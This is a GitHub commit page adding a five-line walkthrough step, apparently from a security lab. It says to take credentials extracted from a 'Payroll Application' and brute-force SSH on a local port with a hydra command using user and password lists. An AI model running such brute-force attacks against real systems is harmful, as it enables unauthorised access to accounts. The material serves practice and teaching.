Create SSH_Bruteforce.md

This commit is contained in:
ACIC 2019-06-13 11:14:35 +03:00 committed by GitHub
parent a952457d0e
commit 11095b6366
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

5
SSH_Bruteforce.md Normal file
View File

@ -0,0 +1,5 @@
1. After extracting credentials from the Payroll Application, use the credentials to run a bruteforce attack.
```
hydra -L user.txt -P pass.txt ssh://127.0.0.1:2222
```